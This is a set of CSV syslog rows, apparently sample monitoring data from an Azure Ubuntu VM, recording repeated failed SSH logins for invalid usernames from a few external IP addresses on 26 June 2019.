+5012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:41,UbuntuDevEnv,2019-06-26 15:09:40,auth,UbuntuDevEnv,info,Invalid user tai from 43.229.134.40 port 47572,18104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tai,43.229.134.4,47572,,
+5013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:41,UbuntuDevEnv,2019-06-26 15:09:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:41,UbuntuDevEnv,2019-06-26 15:09:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:42,UbuntuDevEnv,2019-06-26 15:09:42,auth,UbuntuDevEnv,info,Failed password for invalid user tai from 43.229.134.40 port 47572 ssh2,18104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tai,43.229.134.4,47572,,
+5016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:43,UbuntuDevEnv,2019-06-26 15:09:42,auth,UbuntuDevEnv,info,Disconnected from invalid user tai 43.229.134.40 port 47572 [preauth],18104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tai,43.229.134.4,47572,,
+5017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:43,UbuntuDevEnv,2019-06-26 15:09:42,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 47572:11: Bye Bye [preauth],18104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,47572,,
+5018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:46,UbuntuDevEnv,2019-06-26 15:09:46,auth,UbuntuDevEnv,info,Invalid user ckobia from 43.229.134.40 port 47946,18129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ckobia,43.229.134.4,47946,,
+5019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:46,UbuntuDevEnv,2019-06-26 15:09:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:46,UbuntuDevEnv,2019-06-26 15:09:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:47,UbuntuDevEnv,2019-06-26 15:09:46,auth,UbuntuDevEnv,info,Invalid user akim from 164.132.192.219 port 43171,18135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,akim,164.132.192.2,43171,,
+5022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:47,UbuntuDevEnv,2019-06-26 15:09:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,18135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+5023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:47,UbuntuDevEnv,2019-06-26 15:09:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:47,UbuntuDevEnv,2019-06-26 15:09:47,auth,UbuntuDevEnv,info,Failed password for invalid user ckobia from 43.229.134.40 port 47946 ssh2,18129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ckobia,43.229.134.4,47946,,
+5025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:48,UbuntuDevEnv,2019-06-26 15:09:47,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 47946:11: Bye Bye [preauth],18129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,47946,,
+5026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:48,UbuntuDevEnv,2019-06-26 15:09:47,auth,UbuntuDevEnv,info,Disconnected from invalid user ckobia 43.229.134.40 port 47946 [preauth],18129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ckobia,43.229.134.4,47946,,
+5027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:48,UbuntuDevEnv,2019-06-26 15:09:48,auth,UbuntuDevEnv,info,Failed password for invalid user akim from 164.132.192.219 port 43171 ssh2,18135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,akim,164.132.192.2,43171,,
+5028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:48,UbuntuDevEnv,2019-06-26 15:09:48,auth,UbuntuDevEnv,info,Disconnected from invalid user akim 164.132.192.219 port 43171 [preauth],18135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,akim,164.132.192.2,43171,,
+5029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:48,UbuntuDevEnv,2019-06-26 15:09:48,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 43171:11: Bye Bye [preauth],18135,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,43171,,
+5030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:54,UbuntuDevEnv,2019-06-26 15:09:53,auth,UbuntuDevEnv,info,Invalid user semenov from 43.229.134.40 port 48322,18157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semenov,43.229.134.4,48322,,
+5031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:54,UbuntuDevEnv,2019-06-26 15:09:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:54,UbuntuDevEnv,2019-06-26 15:09:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:55,UbuntuDevEnv,2019-06-26 15:09:55,auth,UbuntuDevEnv,info,Failed password for invalid user semenov from 43.229.134.40 port 48322 ssh2,18157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semenov,43.229.134.4,48322,,
+5034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:55,UbuntuDevEnv,2019-06-26 15:09:55,auth,UbuntuDevEnv,info,Disconnected from invalid user semenov 43.229.134.40 port 48322 [preauth],18157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semenov,43.229.134.4,48322,,
+5035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:09:55,UbuntuDevEnv,2019-06-26 15:09:55,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 48322:11: Bye Bye [preauth],18157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,48322,,
+5036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:00,UbuntuDevEnv,2019-06-26 15:09:59,auth,UbuntuDevEnv,info,Invalid user status from 47.254.147.170 port 37484,18184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,status,47.254.147.1,37484,,
+5037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:00,UbuntuDevEnv,2019-06-26 15:09:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:00,UbuntuDevEnv,2019-06-26 15:09:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,18184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+5039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:00,UbuntuDevEnv,2019-06-26 15:10:00,auth,UbuntuDevEnv,info,Invalid user leng from 43.229.134.40 port 48698,18180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leng,43.229.134.4,48698,,
+5040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:00,UbuntuDevEnv,2019-06-26 15:10:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:00,UbuntuDevEnv,2019-06-26 15:10:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:02,UbuntuDevEnv,2019-06-26 15:10:01,auth,UbuntuDevEnv,info,Failed password for invalid user status from 47.254.147.170 port 37484 ssh2,18184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,status,47.254.147.1,37484,,
+5043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:02,UbuntuDevEnv,2019-06-26 15:10:01,auth,UbuntuDevEnv,info,Disconnected from invalid user status 47.254.147.170 port 37484 [preauth],18184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,status,47.254.147.1,37484,,
+5044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:02,UbuntuDevEnv,2019-06-26 15:10:01,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 37484:11: Bye Bye [preauth],18184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,37484,,
+5045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:02,UbuntuDevEnv,2019-06-26 15:10:02,auth,UbuntuDevEnv,info,Failed password for invalid user leng from 43.229.134.40 port 48698 ssh2,18180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leng,43.229.134.4,48698,,
+5046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:02,UbuntuDevEnv,2019-06-26 15:10:02,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 48698:11: Bye Bye [preauth],18180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,48698,,
+5047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:02,UbuntuDevEnv,2019-06-26 15:10:02,auth,UbuntuDevEnv,info,Disconnected from invalid user leng 43.229.134.40 port 48698 [preauth],18180,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leng,43.229.134.4,48698,,
+5048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:07,UbuntuDevEnv,2019-06-26 15:10:07,auth,UbuntuDevEnv,info,Invalid user image from 43.229.134.40 port 49074,18214,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,image,43.229.134.4,49074,,
+5049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:07,UbuntuDevEnv,2019-06-26 15:10:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18214,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:07,UbuntuDevEnv,2019-06-26 15:10:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18214,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:09,UbuntuDevEnv,2019-06-26 15:10:09,auth,UbuntuDevEnv,info,Failed password for invalid user image from 43.229.134.40 port 49074 ssh2,18214,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,image,43.229.134.4,49074,,
+5052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:10,UbuntuDevEnv,2019-06-26 15:10:09,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 49074:11: Bye Bye [preauth],18214,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,49074,,
+5053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:10,UbuntuDevEnv,2019-06-26 15:10:09,auth,UbuntuDevEnv,info,Disconnected from invalid user image 43.229.134.40 port 49074 [preauth],18214,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,image,43.229.134.4,49074,,
+5054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:13,UbuntuDevEnv,2019-06-26 15:10:13,auth,UbuntuDevEnv,info,Invalid user zhouh from 43.229.134.40 port 49448,18233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,43.229.134.4,49448,,
+5055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:13,UbuntuDevEnv,2019-06-26 15:10:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:13,UbuntuDevEnv,2019-06-26 15:10:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:15,UbuntuDevEnv,2019-06-26 15:10:15,auth,UbuntuDevEnv,info,Failed password for invalid user zhouh from 43.229.134.40 port 49448 ssh2,18233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,43.229.134.4,49448,,
+5058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:16,UbuntuDevEnv,2019-06-26 15:10:15,auth,UbuntuDevEnv,info,Disconnected from invalid user zhouh 43.229.134.40 port 49448 [preauth],18233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,43.229.134.4,49448,,
+5059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:16,UbuntuDevEnv,2019-06-26 15:10:15,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 49448:11: Bye Bye [preauth],18233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,49448,,
+5060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:19,UbuntuDevEnv,2019-06-26 15:10:19,auth,UbuntuDevEnv,info,Invalid user ftp_user from 43.229.134.40 port 49824,18257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,43.229.134.4,49824,,
+5061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:19,UbuntuDevEnv,2019-06-26 15:10:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:19,UbuntuDevEnv,2019-06-26 15:10:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:21,UbuntuDevEnv,2019-06-26 15:10:21,auth,UbuntuDevEnv,info,Failed password for invalid user ftp_user from 43.229.134.40 port 49824 ssh2,18257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,43.229.134.4,49824,,
+5064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:22,UbuntuDevEnv,2019-06-26 15:10:21,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp_user 43.229.134.40 port 49824 [preauth],18257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,43.229.134.4,49824,,
+5065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:22,UbuntuDevEnv,2019-06-26 15:10:21,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 49824:11: Bye Bye [preauth],18257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,49824,,
+5066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:26,UbuntuDevEnv,2019-06-26 15:10:26,auth,UbuntuDevEnv,info,Invalid user uk from 43.229.134.40 port 50200,18289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uk,43.229.134.4,50200,,
+5067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:26,UbuntuDevEnv,2019-06-26 15:10:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.229.134.40,18289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.229.134.4,,0,
+5068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:26,UbuntuDevEnv,2019-06-26 15:10:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:29,UbuntuDevEnv,2019-06-26 15:10:28,auth,UbuntuDevEnv,info,Failed password for invalid user uk from 43.229.134.40 port 50200 ssh2,18289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uk,43.229.134.4,50200,,
+5070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:29,UbuntuDevEnv,2019-06-26 15:10:28,auth,UbuntuDevEnv,info,Received disconnect from 43.229.134.40 port 50200:11: Bye Bye [preauth],18289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.229.134.4,50200,,
+5071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:10:29,UbuntuDevEnv,2019-06-26 15:10:28,auth,UbuntuDevEnv,info,Disconnected from invalid user uk 43.229.134.40 port 50200 [preauth],18289,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uk,43.229.134.4,50200,,
